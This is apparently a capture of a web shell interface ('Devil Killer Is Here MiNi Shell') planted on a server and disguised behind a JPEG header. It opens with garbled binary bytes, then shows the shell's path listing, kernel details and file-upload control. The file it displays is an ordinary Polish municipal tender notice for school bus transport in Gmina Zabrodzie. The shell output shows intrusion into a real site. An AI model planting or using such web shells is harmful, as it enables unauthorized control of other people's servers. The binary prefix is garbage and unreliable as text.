JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230615/0026189001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Zabrodzie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667988</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Władysława Stanisława Reymonta</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabrodzie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zabrodzie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zabrodzie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9eec5e5f-0b6f-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00261890</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00051652/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9eec5e5f-0b6f-11ee-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania opisane w punkcie 9. Informacja o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE.L. 2016.119.1), dalej RODO, informuję o zasadach przetwarzania Pani/Pana danych osobowych oraz o przysługujących Pani/Panu prawach z tym związanych.<br/>1. Administratorem przetwarzającym Pani/Pana dane osobowe jest Wójt Gminy Zabrodzie , z siedzibą przy ul. Wł. St. Reymonta 51, 07-230 Zabrodzie.<br/>2. W Urzędzie Gminy w Zabrodziu wyznaczony został Inspektor Ochrony Danych, kontakt e-mail: ochronadanych@zabrodzie.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) w/w Rozporządzenia mającego na celu wypełnienie obowiązku w zakresie sprawowania władzy publicznej, ciążącego na administratorze w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Dowożenie uczniów do szkół na terenie Gminy Zabrodzie wraz z zapewnieniem opieki.”<br/> prowadzonym w trybie art. 275 pkt1 ustawy z dnia 11 września 2019r. Prawo Zamówień Publicznych (Dz. U. z 2022r. poz. 1710 ze zm.) nr postępowania RG.271.12.2023.<br/>4. Odbiorcą Pani/Pana danych osobowych są podmioty uprawnione na podstawie przepisów prawa oraz osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Prawo zamówień publicznych. <br/>5. Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 97 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Przysługuje Pani/Panu, w zależności od charakteru przetwarzania prawo dostępu do danych osobowych Pani/Pana dotyczących na podstawie art. 15 RODO, na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*, na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**, prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych- ul. Stawki 2, 00-193 Warszawa.<br/> Nie przysługuje Pani/Panu w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>7. Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym w celu realizacji zadań, o których mowa w pkt 3. Jest Pani/Pan zobowiązany do ich podania, a konsekwencją niepodania danych osobowych będzie zastosowanie sankcji, określonych w przepisach prawa.<br/>8. Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu, o którym mowa w art. 22 ust. 1 i 4 Rozporządzenia.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.12.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: usługa polegająca na dowozie uczniów z miejscowości położonych na terenie Gminy Zabrodzie do niżej wymienionych placówek oświatowych zlokalizowanych na terenie Gminy Zabrodzie oraz odwóz po zajęciach na podstawie zakupionych biletów miesięcznych w roku szkolnym 2023/2024 oraz 2024/2025:<br/>- Zespół Szkolno – Przedszkolny w Zabrodziu- adres szkoły: Zabrodzie ul. Szkolna 3<br/>- Zespół Szkolno – Przedszkolny w Adelinie – adres szkoły: Zabrodzie ul. Wł.St.Reymonta 47<br/>Zapewnienie opiekunów leży po stronie Wykonawcy.<br/>Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała lub śmierć czy szkoda materialna spowodowana działalnością Wykonawcy.<br/>Przewóz będzie polegał na zabieraniu uczniów z wyznaczonych przystanków na określonych trasach i ich przewóz do placówek oświatowych na określoną godzinę i z powrotem. Uczeń musi zostać dowieziony najwcześniej 30 minut przed rozpoczęciem zajęć (rozpoczęcie zajęć w: Zespole Szkolno – Przedszkolnym w Zabrodziu godz. 8:00, Zespole Szkolno – Przedszkolny w Adelinie godz. 8:55) i odwieziony nie później niż 2 godziny po zakończeniu zajęć. <br/>Wykonawca zobowiązany będzie do sprzedaży biletów miesięcznych oddzielnie na każdy miesiąc wg przekazanej listy uczniów. Usługa przewozu osób realizowana będzie na trasach obejmujących miejscowości, z których dojeżdżają uczniowie z wyznaczonych przystanków do placówek oświatowych na terenie Gminy Zabrodzie z powrotem we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego 2023/2024 oraz 2024/2025. Usługa będzie świadczona w dni nauki szkolnej.Wykonawca zobowiązany jest również zapewnić transport w dni, w które uczniowie będą odrabiali inne dni zwolnione z nauki szkolnej.<br/>Usługa nie będzie świadczona w sytuacji zamknięcia placówek oświatowych zlokalizowanych na terenie Gminy Zabrodzie z powodów epidemiologicznych bądź innych powodów, w wyniku których zajęcia dydaktyczne i wychowawcze będą odbywały się za pośrednictwem środków porozumiewania się na odległość.<br/>Zamawiający dopuszcza aby Wykonawca wykonywał przewóz uczniów autobusami kursowymi<br/>w komunikacji regularnej ogólnodostępnej – jako publiczny przewóz osób, zgodnie z obowiązującym<br/>go rozkładem jazdy podanym do publicznej wiadomości na przystankach autobusowych. Wykonawca zapewni wykwalifikowanych i posiadających odpowiednie kwalifikacje i dokumenty kierowców.<br/>Usługa świadczona będzie taborem Wykonawcy. Wykonawca zobowiązany jest dostosować do zamówienia odpowiednią liczbę środków transportu w celu realizacji przewozów (minimum 2 autobusy) zgodnie<br/>z rozkładem jazdy i ilością zakupionych biletów miesięcznych. Wykonawca powinien posiadać pojazdy, które zapewnią prawidłowe wykonanie zamówienia – dysponować autobusami o ilości zapewniającej przewóz przewidywanej liczby uczniów na poszczególnych trasach z zapewnieniem miejsc siedzących dla tych uczniów.<br/><br/>Przewidywany rozkład tras dowozu przed lekcjami:<br/>Lp.	Trasa przejazdu	Przewidywana liczba uczniów<br/>1.	ZSP Zabrodzie ul. Szkolna 3- Adelin (wieś)- Adelin (Mostek)- Mościska – Obrąb- Kiciny- Choszczowe- ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)	Ok.35<br/>2. ZSP Zabrodzie ul. Szkolna 3– Mostówka – Anastazew (Krzyż) – Anastazew (Dom Kultury)- Anastazew (Zakręt) – Podgać (Sołtys) – Basinów (Kukawki)- Basinów (Krzyż) – Basinów (Pałki) – Płatków (Sklep) – Płatków (Piaskowa) – Kiciny (Krzyżówki) – Choszczowe (Wieś)- Choszczowe (Struga) – ZSP Adelin (z siedzibą <br/>ul. Wł.St.Reymonta 47)	Ok.25<br/>3.	ZSP Adelin (siedzibą ul. Wł.St.Reymonta 47) - Mostówka- ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)	Ok.30<br/>4.	Słopskul.Kolonijna i Ignacówka-Słopsk (Przy Strumyku) –Słopsk (Rondo) – Słopsk ul. Żołnierska– Słopsk (Remiza)- Słopsk (Jagodowa)- Niegów (Żurawia) – Niegów (Blok)- ZSP Zabrodzie ul. Szkolna 3	Ok. 63<br/>5.	ZSP Zabrodzie ul. Szkolna 3– Gaj (Fiszor) – Gaj (Wieś) – Mostówka – ZSP Zabrodzie ul. Szkolna 3	Ok.53<br/>6.	Młynarze (Wieś)- Młynarze (Most)- Głuchy (za wiaduktem)- Głuchy (Trakt Napoleoński) – Wysychy (Wieś)- Wysychy (Łączna)- ZSP Zabrodzie ul. Szkolna 3	Ok.51<br/><br/>Przewidywany projekt odwozu:<br/>Lp.	Trasa Przejazdu <br/>	Po lekcji:<br/> (ok.257 dzieci)<br/>1.	ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)- Adelin (Grzegorzewo)-Adelin (Wieś)- Adelin (Mostek)- Mościska (Szkoła)- Obrąb- Kiciny (Szkoła)- Choszczowe- Choszczowe (Wieś)- Choszczowe (Struga)- Mostówka (Kościół)- Mostówka (Sklep)- Anastazew- Anastazew (Krzyż)- Anastazew (Dom Kultury)- Anastazew (Zakręt)- Pogdać (Wieś)- Pogdać (Las)- Pogdać (Sołtys)- Basinów (Kukawki)- Basinów (Krzyż)- Basinów (Pałki)- Płatków (Sklep)- Płatków (Piaskowa)- ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)	Po 5 lekcji (ok.13:40)<br/>2.	ZSP Adelin (z siedzibą ul. Wł.St.Reymonta 47)- Adelin (Grzegorzewo)-Adelin (Wieś)- Adelin (Mostek)- Mościska (Szkoła)- Obrąb- Kiciny (Szkoła)- Choszczowe- Choszczowe (Wieś)- Choszczowe (Struga)- Mostówka (Kościół)- Mostówka (Sklep)- Anastazew- Anastazew (Krzyż)- Anastazew (Dom Kultury)- Anastazew (Zakręt)- Pogdać (Wieś)- Pogdać (Las)- Pogdać (Sołtys)- Basinów (Kukawki)- Basinów (Krzyż)- Basinów (Pałki)- Płatków (Sklep)- Płatków (Piaskowa)	Po 7 lekcji (ok.15:30)<br/>3.	ZSP Zabrodzie ul. Szkolna 3 - Mostówka – Gaj- Fiszor- Niegów – Słopsk- ZSP Zabrodzie ul. Szkolna 3	Po 4 lekcji (ok.11:50)<br/>4.	ZSP Zabrodzie ul. Szkolna 3 - Mostówka – Gaj Fiszor- ZSP Zabrodzie ul. Szkolna 3	Po 5 lekcji (ok.12:45)<br/>5.	ZSP Zabrodzie ul. Szkolna 3 - Niegów- Słopsk- Młynarze- ZSP Zabrodzie ul. Szkolna 3	Ok. 13:00<br/>6.	ZSP Zabrodzie ul. Szkolna 3- Wysychy- Głuchy- ZSP Zabrodzie ul. Szkolna 3	Po 6 lekcji (ok.13:40)<br/>7.	ZSP Zabrodzie ul. Szkolna 3 - Gaj- Fiszor- Słopsk- Młynarze- ZSP Zabrodzie ul. Szkolna 3	Po 7 lekcji (ok.14:25)<br/>8.	ZSP Zabrodzie ul. Szkolna 3 - Pozostali uczniowie <br/>w zależności od zajęć	Po 8 lekcji (ok. 15:30)<br/><br/>Łączna długość tras wynosi ok 6000 km miesięcznie.<br/> <br/>Szczegółowy wykaz linii oraz rozkłady jazdy zostaną uzgodnione z wybranym Wykonawcą. Istnieje możliwość łączenia tras.<br/><br/>Liczba uczniów na poszczególnych trasach jest liczbą, która może ulec zmianie w trakcie trwania umowy,<br/>na co Wykonawca musi być przygotowany. W przypadku zmiany liczby uczniów wynagrodzenie Wykonawcy wynikać będzie z faktycznej ilości zakupionych biletów miesięcznych. Zamawiający zastrzega sobie prawo zmiany tras przewozu dzieci, ilości przewozów w tygodniu, terminów ich wykonywania oraz liczby dzieci, ze względu na okoliczności, których strony nie mogły przewidzieć w chwili zawarcia umowy, a podyktowane potrzebami zamawiającego wynikającymi z realizacji obowiązku zapewnienia uczniom dowozu do szkoły.<br/>Wykonawca zobowiązany będzie do punktualnego wykonywania usługi, posiadania taboru zastępczego<br/>w przypadku awarii wskazanego pojazdu. W przypadku awarii jednego z pojazdów Wykonawca zobowiązany jest podstawić niezwłocznie pojazd zastępczy nie gorszy od wskazanego w ofercie.<br/>Wykonawca zobowiązany będzie do wykonywania usługi sprawnymi technicznie pojazdami posiadającymi aktualne badania techniczne. Ponadto Wykonawca będzie dbał o czystość oraz o właściwy stan techniczny pojazdów zapewniający odpowiedni komfort jazdy.<br/>Wykonawca zobowiązany będzie wykonywać zamówienie zgodnie z zasadami i obowiązkami wynikającymi z ustawy z dnia 6 września 2001 roku o transporcie drogowym oraz ustawy z dnia 20 czerwca 1997 roku Prawo o ruchu drogowym. Przedmiot niniejszego zamówienia musi być wykonany zgodnie z innymi aktualnie obowiązującymi przepisami prawa w zakresie obowiązującym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-01 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji autobusu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający na podstawie art. 112 ustawy określa warunki udziału w postępowaniu dotyczące: zdolności technicznej lub<br/>zawodowej. Wykonawca spełni warunki, jeżeli wykaże, że:<br/>a) w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów - Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada aktualne zezwolenie na<br/>wykonywanie zawodu przewoźnika drogowego zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (lub<br/>inny równoważny dokument (licencję) zezwalający na wykonywanie krajowego transportu drogowego osób.<br/>b) w zakresie potencjału technicznego – zamawiający uzna warunek za spełniony jeżeli Wykonawca, wykaże, że posiada do<br/>dyspozycji przynajmniej cztery autobusy o liczbie miejsc siedzących minimum 50 (należy załączyć dokument potwierdzający<br/>spełnienie tego warunku i wskazać, które autobusy potwierdzają spełnienie warunku)<br/>c) w zakresie potencjału zawodowego - zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje<br/>czterema kierowcami, spełniającymi wymagania określone w przepisach ustawy z dnia 20 czerwca 1997r. Prawo o ruchu<br/>drogowym (tj. Dz. U. z 2022 r. poz.988 z późm. zm.) określającym wymagania w stosunku do kierowców.<br/>2. Wykonawcy na podstawie art. 58 ustawy mogą wspólnie ubiegać się o udzielenie zamówienia (np. spółka cywilna,<br/>konsorcjum).<br/>3. Wykonawca na zasadach opisanych w art. 118-123 ustawy może w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, o których mowa w ust. 1 w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego<br/>części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby (potencjał podmiotu<br/>trzeciego), niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>4. Zamawiający informuje, iż „stosowna sytuacja”, o której mowa w ust. 3 wystąpi wyłącznie w przypadku kiedy:<br/>1) wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, złoży wraz z ofertą zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia<br/>lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów;2) zamawiający oceni, czy udostępniane wykonawcy przez podmioty udostępniające 